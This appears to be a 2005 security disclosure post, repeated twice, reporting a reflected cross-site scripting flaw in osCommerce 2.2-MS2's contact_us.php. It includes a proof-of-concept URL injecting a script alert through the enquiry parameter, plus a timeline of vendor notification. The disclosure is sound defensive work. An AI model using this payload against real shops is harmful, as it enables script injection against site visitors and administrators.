John Cobb
16/02/05, 00:55
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC@NoBytes.com
http://www.nobytes.com
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC@NoBytes.com
http://www.nobytes.com